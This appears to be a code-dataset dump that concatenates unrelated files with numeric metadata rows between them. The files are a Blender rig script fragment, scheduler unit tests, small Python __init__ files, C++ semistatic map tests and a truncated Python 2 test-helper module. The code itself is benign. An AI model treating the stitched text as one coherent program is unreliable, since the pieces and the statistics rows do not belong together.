pbone.bone.layers = [False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['hand.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
bpy.ops.object.mode_set(mode='EDIT')
for bone in arm.edit_bones:
bone.select = False
bone.select_head = False
bone.select_tail = False
for b in bones:
bone = arm.edit_bones[bones[b]]
bone.select = True
bone.select_head = True
bone.select_tail = True
arm.edit_bones.active = bone
arm.layers = [(x in [3, 7, 10, 13, 16]) for x in range(32)]
if __name__ == "__main__":
create(bpy.context.active_object)
| 49.802632
| 270
| 0.664641
| 4,964
| 34,065
| 4.456285
| 0.04311
| 0.576827
| 0.754713
| 0.858912
| 0.90778
| 0.814158
| 0.808101
| 0.786538
| 0.756476
| 0.740202
| 0
| 0.073222
| 0.184941
| 34,065
| 684
| 271
| 49.802632
| 0.723501
| 0.001145
| 0
| 0.481315
| 1
| 0
| 0.04529
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001495
| false
| 0.023916
| 0.00299
| 0
| 0.004484
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
2277be39f191bc8f598df136ae1c02cc560453b5
| 12,007
|
py
|
Python
|
tests/test_scheduler.py
|
apple/ml-cvnets
|
84d992f413e52c0468f86d23196efd9dad885e6f
|
[
"AML"
] | 209
|
2021-10-30T08:32:10.000Z
|
2022-03-31T16:18:03.000Z
|
tests/test_scheduler.py
|
apple/ml-cvnets
|
84d992f413e52c0468f86d23196efd9dad885e6f
|
[
"AML"
] | 12
|
2021-12-04T10:47:11.000Z
|
2022-03-31T15:39:40.000Z
|
tests/test_scheduler.py
|
apple/ml-cvnets
|
84d992f413e52c0468f86d23196efd9dad885e6f
|
[
"AML"
] | 50
|
2021-11-01T08:15:02.000Z
|
2022-03-29T08:17:34.000Z
|
#
# For licensing see accompanying LICENSE file.
# Copyright (C) 2022 Apple Inc. All Rights Reserved.
#
import numpy as np
import random
from pprint import pprint
from tqdm import tqdm
from typing import Optional, Union, List
import sys
sys.path.append("..")
from options.opts import get_training_arguments
from optim.scheduler import build_scheduler
from utils import logger
LR_TOLERANCE = 1e-5
MAX_LRS = np.linspace(0.001, 0.1, 10)
WARMUP_ITERATIONS = [None, 100, 1000, 10000]
BATCH_SIZE = 100
DATASET_SIZE = 20000
def run_test(
scheduler, num_epochs: int, num_batches: int, return_all_lrs: Optional[bool] = False
) -> Union[List, float]:
end_lr = [] if return_all_lrs else 0.0
curr_iter = 0
for ep in range(num_epochs):
for b in range(num_batches):
lr = scheduler.get_lr(ep, curr_iter=curr_iter)
curr_iter += 1
# keep only epoch-wise LRs
if return_all_lrs:
end_lr.append(lr)
else:
end_lr = lr
return end_lr
def test_polynomial_scheduler(*args, **kwargs):
opts = get_training_arguments(parse_args=True)
setattr(opts, "scheduler.max_iterations", 100000)
setattr(opts, "scheduler.name", "polynomial")
num_iterations = getattr(opts, "scheduler.max_iterations", 100000)
num_batches = DATASET_SIZE // BATCH_SIZE
num_epochs = num_iterations // num_batches
# Test for iteration-based samplers
setattr(opts, "scheduler.is_iteration_based", True)
test_failed = 0
test_passed = 0
total_tests = 0
failed_test_logs = []
with tqdm(total=len(WARMUP_ITERATIONS) * len(MAX_LRS)) as pbar:
for warmup_iteration in WARMUP_ITERATIONS:
setattr(opts, "scheduler.warmup_iterations", warmup_iteration)
for start_lr in MAX_LRS:
end_lr = round(start_lr / random.randint(2, 10), 5)
setattr(opts, "scheduler.polynomial.start_lr", start_lr)
setattr(opts, "scheduler.polynomial.end_lr", end_lr)
scheduler = build_scheduler(opts)
lr = run_test(
scheduler=scheduler, num_epochs=num_epochs, num_batches=num_batches
)
diff = end_lr - lr
if abs(diff) > LR_TOLERANCE:
failed_test_logs.append("Test failed for end_lr={}".format(end_lr))
test_failed += 1
else:
test_passed += 1
total_tests += 1
# update the progress bar
pbar.update(1)
print("")
if total_tests == test_passed:
logger.log("All tests passed for iteration-based polynomial scheduler")
else:
logger.warning(
"Tests passed={} and Tests failed={} for iteration-based polynomial scheduler".format(
test_passed, test_failed
)
)
pprint(failed_test_logs)
# Test for epoch-based samplers
setattr(opts, "scheduler.is_iteration_based", False)
setattr(opts, "scheduler.max_epochs", num_epochs)
setattr(opts, "scheduler.adjust_period_for_epochs", True)
test_failed = 0
test_passed = 0
total_tests = 0
failed_test_logs = []
with tqdm(total=len(WARMUP_ITERATIONS) * len(MAX_LRS)) as pbar:
for warmup_iteration in WARMUP_ITERATIONS:
setattr(opts, "scheduler.warmup_iterations", warmup_iteration)
for start_lr in MAX_LRS:
end_lr = round(start_lr / random.randint(2, 10), 5)
setattr(opts, "scheduler.polynomial.start_lr", start_lr)
setattr(opts, "scheduler.polynomial.end_lr", end_lr)
scheduler = build_scheduler(opts)
lr = run_test(
scheduler=scheduler, num_epochs=num_epochs, num_batches=num_batches
)
diff = end_lr - lr
if abs(diff) > 1e-3:
failed_test_logs.append(
"Test failed for end_lr={}. Got={}".format(end_lr, lr)
)
test_failed += 1
else:
test_passed += 1
total_tests += 1
# update the progress bar
pbar.update(1)
print("")
if total_tests == test_passed:
logger.log("All tests passed for epoch-based polynomial scheduler")
else:
logger.warning(
"Tests passed={} and Tests failed={} for epoch-based polynomial scheduler".format(
test_passed, test_failed
)
)
pprint(failed_test_logs)
def test_cosine_scheduler(*args, **kwargs):
opts = get_training_arguments(parse_args=True)
setattr(opts, "scheduler.max_iterations", 100000)
setattr(opts, "scheduler.name", "cosine")
num_iterations = getattr(opts, "scheduler.max_iterations", 100000)
num_batches = DATASET_SIZE // BATCH_SIZE
num_epochs = num_iterations // num_batches
# first test for iteration-based samplers
setattr(opts, "scheduler.is_iteration_based", True)
test_failed = 0
test_passed = 0
total_tests = 0
failed_test_logs = []
with tqdm(total=len(WARMUP_ITERATIONS) * len(MAX_LRS)) as pbar:
for warmup_iteration in WARMUP_ITERATIONS:
setattr(opts, "scheduler.warmup_iterations", warmup_iteration)
for start_lr in MAX_LRS:
end_lr = round(start_lr / random.randint(2, 10), 5)
setattr(opts, "scheduler.cosine.max_lr", start_lr)
setattr(opts, "scheduler.cosine.min_lr", end_lr)
scheduler = build_scheduler(opts)
lr = run_test(
scheduler=scheduler, num_epochs=num_epochs, num_batches=num_batches
)
diff = end_lr - lr
if abs(diff) > LR_TOLERANCE:
failed_test_logs.append("Test failed for end_lr={}".format(end_lr))
test_failed += 1
else:
test_passed += 1
total_tests += 1
# update the progress bar
pbar.update(1)
print("")
if total_tests == test_passed:
logger.log("All tests passed for iteration-based cosine scheduler")
else:
logger.warning(
"Tests passed={} and Tests failed={} for iteration-based cosine scheduler".format(
test_passed, test_failed
)
)
pprint(failed_test_logs)
# Test for epoch-based samplers
setattr(opts, "scheduler.is_iteration_based", False)
setattr(opts, "scheduler.max_epochs", num_epochs)
setattr(opts, "scheduler.adjust_period_for_epochs", True)
test_failed = 0
test_passed = 0
total_tests = 0
failed_test_logs = []
with tqdm(total=len(WARMUP_ITERATIONS) * len(MAX_LRS)) as pbar:
for warmup_iteration in WARMUP_ITERATIONS:
setattr(opts, "scheduler.warmup_iterations", warmup_iteration)
for start_lr in MAX_LRS:
end_lr = round(start_lr / random.randint(2, 10), 5)
setattr(opts, "scheduler.cosine.max_lr", start_lr)
setattr(opts, "scheduler.cosine.min_lr", end_lr)
scheduler = build_scheduler(opts)
lr = run_test(
scheduler=scheduler, num_epochs=num_epochs, num_batches=num_batches
)
diff = end_lr - lr
if abs(diff) > 1e-3:
failed_test_logs.append(
"Test failed for end_lr={}. Got={}".format(end_lr, lr)
)
test_failed += 1
else:
test_passed += 1
total_tests += 1
# update the progress bar
pbar.update(1)
print("")
if total_tests == test_passed:
logger.log("All tests passed for epoch-based cosine scheduler")
else:
logger.warning(
"Tests passed={} and Tests failed={} for epoch-based cosine scheduler".format(
test_passed, test_failed
)
)
pprint(failed_test_logs)
def test_fixed_scheduler(*args, **kwargs):
opts = get_training_arguments(parse_args=True)
setattr(opts, "scheduler.max_iterations", 100000)
setattr(opts, "scheduler.name", "fixed")
num_iterations = getattr(opts, "scheduler.max_iterations", 100000)
num_batches = DATASET_SIZE // BATCH_SIZE
num_epochs = num_iterations // num_batches
# Test for iteration-based samplers
setattr(opts, "scheduler.is_iteration_based", True)
test_failed = 0
test_passed = 0
total_tests = 0
failed_test_logs = []
with tqdm(total=len(WARMUP_ITERATIONS) * len(MAX_LRS)) as pbar:
for warmup_iteration in WARMUP_ITERATIONS:
setattr(opts, "scheduler.warmup_iterations", warmup_iteration)
for start_lr in MAX_LRS:
setattr(opts, "scheduler.fixed.lr", start_lr)
scheduler = build_scheduler(opts)
lr = run_test(
scheduler=scheduler, num_epochs=num_epochs, num_batches=num_batches
)
diff = start_lr - lr
if abs(diff) > LR_TOLERANCE:
failed_test_logs.append(
"Test failed for end_lr={}".format(start_lr)
)
test_failed += 1
else:
test_passed += 1
total_tests += 1
# update the progress bar
pbar.update(1)
print("")
if total_tests == test_passed:
logger.log("All tests passed for iteration-based fixed scheduler")
else:
logger.warning(
"Tests passed={} and Tests failed={} for iteration-based fixed scheduler".format(
test_passed, test_failed
)
)
pprint(failed_test_logs)
# Test for epoch-based samplers
setattr(opts, "scheduler.is_iteration_based", False)
setattr(opts, "scheduler.max_epochs", num_epochs)
setattr(opts, "scheduler.adjust_period_for_epochs", True)
test_failed = 0
test_passed = 0
total_tests = 0
failed_test_logs = []
with tqdm(total=len(WARMUP_ITERATIONS) * len(MAX_LRS)) as pbar:
for warmup_iteration in WARMUP_ITERATIONS:
setattr(opts, "scheduler.warmup_iterations", warmup_iteration)
for start_lr in MAX_LRS:
setattr(opts, "scheduler.fixed.lr", start_lr)
scheduler = build_scheduler(opts)
lr = run_test(
scheduler=scheduler, num_epochs=num_epochs, num_batches=num_batches
)
diff = start_lr - lr
if abs(diff) > 1e-3:
failed_test_logs.append(
"Test failed for lr={}. Got={}".format(start_lr, lr)
)
test_failed += 1
else:
test_passed += 1
total_tests += 1
# update the progress bar
pbar.update(1)
print("")
if total_tests == test_passed:
logger.log("All tests passed for epoch-based fixed scheduler")
else:
logger.warning(
"Tests passed={} and Tests failed={} for epoch-based fixed scheduler".format(
test_passed, test_failed
)
)
pprint(failed_test_logs)
def test_scheduler(*args, **kwargs):
logger.info("Running tests with Polynomial schedule")
test_polynomial_scheduler(*args, **kwargs)
logger.double_dash_line()
logger.info("Running tests with Cosine schedule")
test_cosine_scheduler(*args, **kwargs)
logger.double_dash_line()
logger.info("Running tests with fixed schedule")
test_fixed_scheduler(*args, **kwargs)
logger.double_dash_line()
if __name__ == "__main__":
test_scheduler()
| 36.384848
| 98
| 0.592155
| 1,397
| 12,007
| 4.84252
| 0.096636
| 0.071101
| 0.100517
| 0.020399
| 0.880414
| 0.867997
| 0.867997
| 0.862232
| 0.862232
| 0.862232
| 0
| 0.016887
| 0.319397
| 12,007
| 329
| 99
| 36.495441
| 0.81094
| 0.038478
| 0
| 0.713768
| 0
| 0
| 0.170209
| 0.067667
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018116
| false
| 0.130435
| 0.032609
| 0
| 0.054348
| 0.047101
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
3f2610204b2a11fc63eaacbc48199a38be50acb1
| 144
|
py
|
Python
|
appbundler/__init__.py
|
mab4058/appbundler
|
e1c3cb747ba3a23d517ec5ba73e26328845fa703
|
[
"MIT"
] | null | null | null |
appbundler/__init__.py
|
mab4058/appbundler
|
e1c3cb747ba3a23d517ec5ba73e26328845fa703
|
[
"MIT"
] | null | null | null |
appbundler/__init__.py
|
mab4058/appbundler
|
e1c3cb747ba3a23d517ec5ba73e26328845fa703
|
[
"MIT"
] | null | null | null |
from .__version__ import __version__
from .appbundler import AppBundler
from .appbundler import Config
from .appbundler import SupplementalData
| 28.8
| 40
| 0.861111
| 16
| 144
| 7.25
| 0.375
| 0.362069
| 0.517241
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 144
| 4
| 41
| 36
| 0.90625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3f53f4581d01ca58b4285f339130830c9675143d
| 96
|
py
|
Python
|
stattools/datasets/__init__.py
|
artemmavrin/SLTools
|
04525b5d6777be3ccdc6ad44e4cbfe24a8875933
|
[
"MIT"
] | 2
|
2018-07-10T22:16:23.000Z
|
2019-10-08T00:12:44.000Z
|
stattools/datasets/__init__.py
|
artemmavrin/SLTools
|
04525b5d6777be3ccdc6ad44e4cbfe24a8875933
|
[
"MIT"
] | null | null | null |
stattools/datasets/__init__.py
|
artemmavrin/SLTools
|
04525b5d6777be3ccdc6ad44e4cbfe24a8875933
|
[
"MIT"
] | 4
|
2019-05-17T23:06:07.000Z
|
2021-03-22T14:04:24.000Z
|
"""Some small datasets."""
from .load import load_lsat_gpa
from .load import load_old_faithful
| 19.2
| 35
| 0.78125
| 15
| 96
| 4.733333
| 0.666667
| 0.225352
| 0.394366
| 0.507042
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 96
| 4
| 36
| 24
| 0.845238
| 0.208333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
3f67ef1cb9e1592edf7123de7afa8b5785777832
| 8,299
|
py
|
Python
|
tests/data_structures/test_semistatic_map.py
|
TinkerBoard-Android/external-google-fruit
|
57123c8a2477a4d99cb68c53d195e9fb428dd535
|
[
"Apache-2.0"
] | 1,666
|
2015-01-04T08:52:43.000Z
|
2022-03-28T11:06:19.000Z
|
tests/data_structures/test_semistatic_map.py
|
TinkerBoard-Android/external-google-fruit
|
57123c8a2477a4d99cb68c53d195e9fb428dd535
|
[
"Apache-2.0"
] | 135
|
2015-02-19T11:35:07.000Z
|
2022-03-29T05:00:42.000Z
|
tests/data_structures/test_semistatic_map.py
|
TinkerBoard-Android/external-google-fruit
|
57123c8a2477a4d99cb68c53d195e9fb428dd535
|
[
"Apache-2.0"
] | 253
|
2015-01-14T08:15:10.000Z
|
2022-03-24T07:49:53.000Z
|
#!/usr/bin/env python3
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from absl.testing import parameterized
from fruit_test_common import *
COMMON_DEFINITIONS = '''
#include "test_common.h"
#define IN_FRUIT_CPP_FILE 1
#include <fruit/impl/data_structures/semistatic_map.templates.h>
using namespace std;
using namespace fruit::impl;
'''
class TestSemistaticMap(parameterized.TestCase):
def test_empty(self):
source = '''
int main() {
MemoryPool memory_pool;
vector<pair<int, std::string>> values{};
SemistaticMap<int, std::string> map(values.begin(), values.end(), values.size(), memory_pool);
Assert(map.find(0) == nullptr);
Assert(map.find(2) == nullptr);
Assert(map.find(5) == nullptr);
}
'''
expect_success(
COMMON_DEFINITIONS,
source,
locals())
def test_1_elem(self):
source = '''
int main() {
MemoryPool memory_pool;
vector<pair<int, std::string>> values{{2, "foo"}};
SemistaticMap<int, std::string> map(values.begin(), values.end(), values.size(), memory_pool);
Assert(map.find(0) == nullptr);
Assert(map.find(2) != nullptr);
Assert(map.at(2) == "foo");
Assert(map.find(5) == nullptr);
}
'''
expect_success(
COMMON_DEFINITIONS,
source,
locals())
def test_1_inserted_elem(self):
source = '''
int main() {
MemoryPool memory_pool;
vector<pair<int, std::string>> values{};
SemistaticMap<int, std::string> old_map(values.begin(), values.end(), values.size(), memory_pool);
vector<pair<int, std::string>, ArenaAllocator<pair<int, std::string>>> new_values(
{{2, "bar"}},
ArenaAllocator<pair<int, std::string>>(memory_pool));
SemistaticMap<int, std::string> map(old_map, std::move(new_values));
Assert(map.find(0) == nullptr);
Assert(map.find(2) != nullptr);
Assert(map.at(2) == "bar");
Assert(map.find(5) == nullptr);
}
'''
expect_success(
COMMON_DEFINITIONS,
source,
locals())
def test_3_elem(self):
source = '''
int main() {
MemoryPool memory_pool;
vector<pair<int, std::string>> values{{1, "foo"}, {3, "bar"}, {4, "baz"}};
SemistaticMap<int, std::string> map(values.begin(), values.end(), values.size(), memory_pool);
Assert(map.find(0) == nullptr);
Assert(map.find(1) != nullptr);
Assert(map.at(1) == "foo");
Assert(map.find(2) == nullptr);
Assert(map.find(3) != nullptr);
Assert(map.at(3) == "bar");
Assert(map.find(4) != nullptr);
Assert(map.at(4) == "baz");
Assert(map.find(5) == nullptr);
}
'''
expect_success(
COMMON_DEFINITIONS,
source,
locals())
def test_1_elem_2_inserted(self):
source = '''
int main() {
MemoryPool memory_pool;
vector<pair<int, std::string>> values{{1, "foo"}};
SemistaticMap<int, std::string> old_map(values.begin(), values.end(), values.size(), memory_pool);
vector<pair<int, std::string>, ArenaAllocator<pair<int, std::string>>> new_values(
{{3, "bar"}, {4, "baz"}},
ArenaAllocator<pair<int, std::string>>(memory_pool));
SemistaticMap<int, std::string> map(old_map, std::move(new_values));
Assert(map.find(0) == nullptr);
Assert(map.find(1) != nullptr);
Assert(map.at(1) == "foo");
Assert(map.find(2) == nullptr);
Assert(map.find(3) != nullptr);
Assert(map.at(3) == "bar");
Assert(map.find(4) != nullptr);
Assert(map.at(4) == "baz");
Assert(map.find(5) == nullptr);
}
'''
expect_success(
COMMON_DEFINITIONS,
source,
locals())
def test_3_elem_3_inserted(self):
source = '''
int main() {
MemoryPool memory_pool;
vector<pair<int, std::string>> values{{1, "1"}, {3, "3"}, {5, "5"}};
SemistaticMap<int, std::string> old_map(values.begin(), values.end(), values.size(), memory_pool);
vector<pair<int, std::string>, ArenaAllocator<pair<int, std::string>>> new_values(
{{2, "2"}, {4, "4"}, {16, "16"}},
ArenaAllocator<pair<int, std::string>>(memory_pool));
SemistaticMap<int, std::string> map(old_map, std::move(new_values));
Assert(map.find(0) == nullptr);
Assert(map.find(1) != nullptr);
Assert(map.at(1) == "1");
Assert(map.find(2) != nullptr);
Assert(map.at(2) == "2");
Assert(map.find(3) != nullptr);
Assert(map.at(3) == "3");
Assert(map.find(4) != nullptr);
Assert(map.at(4) == "4");
Assert(map.find(5) != nullptr);
Assert(map.at(5) == "5");
Assert(map.find(6) == nullptr);
Assert(map.find(16) != nullptr);
Assert(map.at(16) == "16");
}
'''
expect_success(
COMMON_DEFINITIONS,
source,
locals())
def test_move_constructor(self):
source = '''
int main() {
MemoryPool memory_pool;
vector<pair<int, std::string>> values{{1, "foo"}, {3, "bar"}, {4, "baz"}};
SemistaticMap<int, std::string> map1(values.begin(), values.end(), values.size(), memory_pool);
SemistaticMap<int, std::string> map = std::move(map1);
Assert(map.find(0) == nullptr);
Assert(map.find(1) != nullptr);
Assert(map.at(1) == "foo");
Assert(map.find(2) == nullptr);
Assert(map.find(3) != nullptr);
Assert(map.at(3) == "bar");
Assert(map.find(4) != nullptr);
Assert(map.at(4) == "baz");
Assert(map.find(5) == nullptr);
}
'''
expect_success(
COMMON_DEFINITIONS,
source,
locals())
def test_move_assignment(self):
source = '''
int main() {
MemoryPool memory_pool;
vector<pair<int, std::string>> values{{1, "foo"}, {3, "bar"}, {4, "baz"}};
SemistaticMap<int, std::string> map1(values.begin(), values.end(), values.size(), memory_pool);
SemistaticMap<int, std::string> map;
map = std::move(map1);
Assert(map.find(0) == nullptr);
Assert(map.find(1) != nullptr);
Assert(map.at(1) == "foo");
Assert(map.find(2) == nullptr);
Assert(map.find(3) != nullptr);
Assert(map.at(3) == "bar");
Assert(map.find(4) != nullptr);
Assert(map.at(4) == "baz");
Assert(map.find(5) == nullptr);
}
'''
expect_success(
COMMON_DEFINITIONS,
source,
locals())
if __name__ == '__main__':
absltest.main()
| 38.24424
| 112
| 0.498373
| 891
| 8,299
| 4.547699
| 0.156004
| 0.135489
| 0.13154
| 0.088845
| 0.779862
| 0.773939
| 0.773939
| 0.773939
| 0.773939
| 0.735439
| 0
| 0.021964
| 0.34715
| 8,299
| 216
| 113
| 38.421296
| 0.725914
| 0.071454
| 0
| 0.744565
| 0
| 0.081522
| 0.811102
| 0.054732
| 0
| 0
| 0
| 0
| 0.331522
| 1
| 0.043478
| false
| 0
| 0.01087
| 0
| 0.059783
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
58b7bbd64779424c3b4dc8b6f59680992279e01a
| 13,008
|
py
|
Python
|
cornelltest.py
|
JeffreyTsang/Brickbreaker
|
37f0d143e9f937027fc281aef1511d0e9c804b8b
|
[
"MIT"
] | null | null | null |
cornelltest.py
|
JeffreyTsang/Brickbreaker
|
37f0d143e9f937027fc281aef1511d0e9c804b8b
|
[
"MIT"
] | null | null | null |
cornelltest.py
|
JeffreyTsang/Brickbreaker
|
37f0d143e9f937027fc281aef1511d0e9c804b8b
|
[
"MIT"
] | null | null | null |
# cornelltest.py
# Walker M. White (wmw2), Lillian Lee (LJL2), Steve Marschner (srm2)
# August 20, 2015
"""Unit test support functions
This module provides function-level unit testing tools. It is a replacement for
the built-in Python package unittest, which is much less user friendly and requires
an understanding of OO programming.
The assert functions in this module are different from standard assert statements.
They stop execution of Python and report the location of the error."""
import numpy
import traceback
# STRING TYPE CHECKING
def isfloat(s):
"""**Returns**: True if s is the string representation of a number
:param s: the candidate string to test
**Precondition**: s is a string
"""
try:
x = float(s)
return True
except:
return False
def isint(s):
"""**Returns**: True if s is the string representation of an integer
:param s: the candidate string to test
**Precondition**: s is a string
"""
try:
x = int(s)
return True
except:
return False
def isbool(s):
"""Returns: True if s is the string representation of a boolean
:param s: the candidate string to test
**Precondition**: s is a string
"""
if (type(s) != str):
return False
return (s == 'True' or s == 'False')
# ASSERTION FUNCTIONS
def quit_with_error(msg):
"""Quit Python with an error msg
When testing, this is preferable to raising an error in Python. Once you
have a lot of helper functions, it becomes a lot of work just to figure out
what is going on in the error message. This makes the error clear and concise"""
stack = traceback.extract_stack()
frame = stack[-3]
print msg
if (frame[3] is None):
suffix = ''
else:
suffix = ": "+frame[3]
print 'Line '+repr(frame[1])+' of '+ frame[0] + suffix
print 'Quitting with Error'
quit()
def assert_equals(expected,received):
"""Quit if expected and received differ.
:param expected: The value you expect the test to have
:param received: The value the test actually had
The meaning of "differ" for this function is !=. As a result, this
assert function is not necessarily reliable when expected and received
are of type "float". You should use the function assert_floats_equal
for that application.
As part of the error message, this function provides some minimal
debug information. The following is an example debug message:
assert_equals expected 'yes' but instead got 'no'
"""
if (expected != received):
message = 'assert_equals: expected ' + repr(expected) + ' but instead got ' + repr(received)
quit_with_error(message)
def assert_not_equals(expected,received):
"""Quit if expected and received are the same.
:param expected: The value you expect the test to have
:param received: The value the test actually had
The meaning of "differ" for this function is ==. As a result, this
assert function is not necessarily reliable when expected and received
are of type "float". You should use the function assert_not_floats_equal
for that application.
As part of the error message, this function provides some minimal
debug information. The following is an example debug message:
assert_not_equals expected something different from 'n'
"""
if (expected == received):
message = 'assert_not_equals: expected something different from' + repr(expected)
quit_with_error(message)
def assert_true(received):
"""Quit if received is False.
:param received: The value the test actually had
As part of the error message, this function provides some minimal
debug information. The following is an example debug message:
assert_true expected True but instead got False
"""
if (not received):
msg = "assert_true: expected True but instead got False"
quit_with_error(msg)
def assert_false(received):
"""Quit AssertionError if received is True.
:param received: The value the test actually had
As part of the error message, this function provides some minimal
debug information. The following is an example debug message:
assert_false expected False but instead got True
"""
if (received):
msg = "assert_false: expected False but instead got True"
quit_with_error(msg)
def assert_floats_equal(expected, received):
"""Quit if floats expected and received differ.
:param expected: The value you expect the test to have
**Precondition**: the value must be a float
:param received: The value the test actually had
**Precondition**: the value must be a float
This function takes two numbers and compares them using functions
from the numerical package numpy. This is a scientific computing
package that allows us to test if numbers are "close enough".
Hence, unlike assert_equal, the meaning of "differ" for this
function is however it is defined by numpy.
As part of the error message, this function provides some minimal
debug information. The following is an example debug message:
assert_floats_equal: expected 0.1 but instead got 0.2
IMPORTANT:
The arguments expected and received should each numbers (either floats
or ints). If either argument is not a number, the function quits
with a different error message. For example:
assert_floats_equal: first argument 'alas' is not a number
"""
number = [float, int] # list of number types
if type(expected) not in number:
msg = ("assert_floats_equal: " +
"first argument " + repr(expected) +" is not a number")
quit_with_error(msg)
if type(received) not in number:
msg = ("assert_floats_equal: " +
"second argument " + repr(received) +" is not a number")
quit_with_error(msg)
if (not numpy.allclose([expected],[received])):
msg = ("assert_floats_equal: expected " + repr(expected) +
" but instead got " + repr(received))
quit_with_error(msg)
def assert_floats_not_equal(expected, received):
"""Quit if floats expected and received are the same.
:param expected: The value you expect the test to have
**Precondition**: the value must be a float
:param received: The value the test actually had
**Precondition**: the value must be a float
This function takes two numbers and compares them using functions
from the numerical package numpy. This is a scientific computing
package that allows us to test if numbers are "close enough".
Hence, unlike assert_equal, the meaning of "same" for this
function is however it is defined by numpy.
As part of the error message, this function provides some minimal
debug information. The following is an example debug message:
assert_floats_not_equal: expected something different from 0.1
IMPORTANT:
The arguments expected and received should each numbers (either floats
or ints). If either argument is not a number, the function quits
with a different error message. For example:
"""
number = [float, int] # list of number types
if type(expected) not in number:
msg = ('assert_floats_not_equal: ' +
'first argument ' + repr(expected) +' is not a number')
quit_with_error(msg)
if type(received) not in number:
msg = ("assert_floats_not_equal: " +
"second argument " + repr(received) +" is not a number")
quit_with_error(msg)
if (numpy.allclose([expected],[received])):
msg = ('assert_floats_not_equal: expected something different from' +
repr(expected))
quit_with_error(msg)
def assert_float_lists_equal(expected, received):
"""Quit if the lists of floats expected and received differ
:param expected: The value you expect the test to have
**Precondition**: the value must be a multidimensional list of int or float
:param received: The value the test actually had
**Precondition**: the value must be a multidimensional list of int or float
This function takes two lists of numbers and compares them using
fuctions from the numerical package numpy. This is a scientific
computing package that allows us to test if numbers are "close enough".
Hence, unlike assert_equal, the meaning of "differ" for this
function is however it is defined by numpy.
This function is similar to assert_floats_equal. The difference
is that it works on lists of floats. These lists can be
multidimensional. To illustrate this, the following is an
example debug message:
assert_float_lists__equal: expected [[1,2],[3,4]] but instead got [[1,2],[3,5]]
IMPORTANT:
The arguments expected and received should each lists of numbers.
Furthemore, they must have EXACTLY the same dimension. If not
this function quits with a different error message. For example:
"""
number = [float, int] # list of number types
if type(expected) != list:
msg = ("assert_float_lists_equal: " +
"first argument " + repr(expected) +" is not a list")
quit_with_error(msg)
if type(received) != list:
msg = ("assert_float_lists_equal: " +
"second argument " + repr(received) +" is not a list")
quit_with_error(msg)
if len(expected) != len(received):
msg = ('assert_float_lists_equal: lists ' + repr(expected) +
' and ' + repr(received)+' have different sizes')
quit_with_error(msg)
try:
if (not numpy.allclose([expected],[received])):
msg = ("assert_float_lists_equal: expected " + repr(expected) +
" but instead got " + repr(received))
quit_with_error(msg)
except:
msg = ('assert_float_lists_equal: lists ' + repr(expected) +
' and ' + repr(received)+' are not comparable')
quit_with_error(msg)
def assert_float_lists_not_equal(expected, received):
"""Quit if the lists of floats expected and received are the same
:param expected: The value you expect the test to have
**Precondition**: the value must be a multidimensional list of int or float
:param received: The value the test actually had
**Precondition**: the value must be a multidimensional list of int or float
This function takes two lists of numbers and compares them using
fuctions from the numerical package numpy. This is a scientific
computing package that allows us to test if numbers are "close enough".
Hence, unlike assert_equal, the meaning of "same" for this
function is however it is defined by numpy.
This function is similar to assert_floats_equal. The difference
is that it works on lists of floats. These lists can be
multidimensional. To illustrate this, the following is an
example debug message:
assert_float_lists_not_equal: expected something different from [[1,2],[3,4]]
IMPORTANT:
The arguments expected and received should each lists of numbers.
Furthemore, they must have EXACTLY the same dimension. If not
this function quits with a different error message. For example:
assert_float_lists_not_equal: first argument 'alas' is not a list
or
